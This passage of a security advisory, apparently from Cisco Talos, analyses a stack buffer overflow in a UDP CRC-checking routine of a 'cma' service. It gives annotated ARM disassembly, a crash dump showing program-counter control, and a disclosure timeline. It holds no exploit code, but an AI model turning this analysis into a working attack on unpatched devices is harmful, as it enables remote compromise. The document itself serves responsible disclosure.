    .text:0001D790                 LDR     R0, [R11,#udpFd] ; fd
    .text:0001D794                 MOV     R1, R3          ; message
    .text:0001D798                 MOV     R2, #0          ; flags
    .text:0001D79C                 BL      recvmsg                                  [7] recvmsg(udpFd, &message, 0);
    

After a successful call to recvmsg, the udp_thread function will null-terminate the msgbuf buffer at the first instance of \r\n. The msgbuf buffer is then passed to check_udp_crc to confirm the payload’s CRC is valid.

    .text:0001D7C8                 SUB     R3, R11, #-msgbuf
    .text:0001D7CC                 MOV     R0, R3          ; s
    .text:0001D7D0                 LDR     R1, =asc_2FCD8  ; "\r\n"
    .text:0001D7D4                 BL      strcspn                                  [8] $r0 = strcspn(msgbuf, "\r\n")
    .text:0001D7D8                 MOV     R2, R0
    .text:0001D7DC                 LDR     R3, =0xFFFFFC8C
    .text:0001D7E0                 SUB     R0, R11, #-var_C
    .text:0001D7E4                 ADD     R2, R0, R2
    .text:0001D7E8                 ADD     R3, R2, R3
    .text:0001D7EC                 MOV     R2, #0
    .text:0001D7F0                 STRB    R2, [R3]                                 [9] msgbuf[$r0] = '\0'
    .text:0001D7F4                 SUB     R3, R11, #-msgbuf
    .text:0001D7F8                 MOV     R0, R3          ; msg
    .text:0001D7FC                 BL      check_udp_crc                            [10] check_udp_crc(msgbuf)
    

While the maximum length of the UDP payload in udp_thread is 512 bytes, the check_udp_crc function only allocates 256 bytes for its internal copy of the payload. A memcpy is executed which will copy strlen(msg) bytes from msgbuf into msg, resulting in a very straightforward buffer overflow.

    .text:0001D134                 PUSH    {R11,LR}
    .text:0001D138                 ADD     R11, SP, #4
    .text:0001D13C                 SUB     SP, SP, #0x128
    .text:0001D140                 STR     R0, [R11,#msg]
    .text:0001D144                 SUB     R3, R11, #-msg_buf
    .text:0001D148                 MOV     R0, R3          ; s
    .text:0001D14C                 MOV     R1, #0          ; c
    .text:0001D150                 MOV     R2, #0x100      ; n
    .text:0001D154                 BL      memset                                   [11] memset(msg, 0, 256)
    .text:0001D158                 LDR     R0, [R11,#msg]  ; s
    .text:0001D15C                 BL      strlen                                   
    .text:0001D160                 MOV     R3, R0                                   [12] msglen = strlen(msg)
    .text:0001D164                 SUB     R2, R11, #-msg_buf
    .text:0001D168                 MOV     R0, R2          ; dest
    .text:0001D16C                 LDR     R1, [R11,#msg]  ; src
    .text:0001D170                 MOV     R2, R3          ; n                      
    .text:0001D174                 BL      memcpy                                   [13] memcpy(msg, msgbuf, msglen)
    

As shown above, a maliciously crafted UDP packet with a significantly long payload will result in a buffer overflow. This overflow directly leads to attacker control of the program counter, which may be seen in the debugger output below.

**Crash Information**

    Thread 2 "cma" received signal SIGSEGV, Segmentation fault.
    0x4d4d4d4c in ?? ()
    ──────────────────────────────────────────────────────────────────────────────────────────────── registers ────
    $r0  : 0x1       
    $r1  : 0x3b      
    $r2  : 0x1       
    $r3  : 0x1       
    $r4  : 0x0       
    $r5  : 0xb636b6b0  →  "eth0"
    $r6  : 0x0       
    $r7  : 0x152     
    $r8  : 0xbefffbe0  →  0x00000000
    $r9  : 0xb6ff86d0  →  0xb6ff8db8  →  0x00000001
    $r10 : 0xb636c460  →  0x00000001
    $r11 : 0x4d4d4d4d ("MMMM"?)
    $r12 : 0xb636b6a8  →  0x00000000
    $sp  : 0xb636b6a0  →  0xb636b7d0  →  0x00000018
    $lr  : 0xb6bf7898  →  <strrchr+40> cmp r0,  #0
    $pc  : 0x4d4d4d4c ("LMMM"?)
    $cpsr: [negative ZERO CARRY overflow interrupt fast THUMB]
    ─────────────────────────────────────────────────────────────────────────────────────────── code:arm:THUMB ────
    [!] Cannot disassemble from $PC
    [!] Cannot access memory at address 0x4d4d4d4c
    ───────────────────────────────────────────────────────────────────────────────────────────────────────────────
    

**Timeline**

2021-08-17 - Vendor Disclosure  
2021-11-10 - Talos granted disclosure extension  
2021-12-13 - Vendor patched  
2021-12-15 - Talos tested patch  
2021-12-20 - Public Release

Discovered by Matt Wiseman of Cisco Talos.

Tag

#buffer_overflow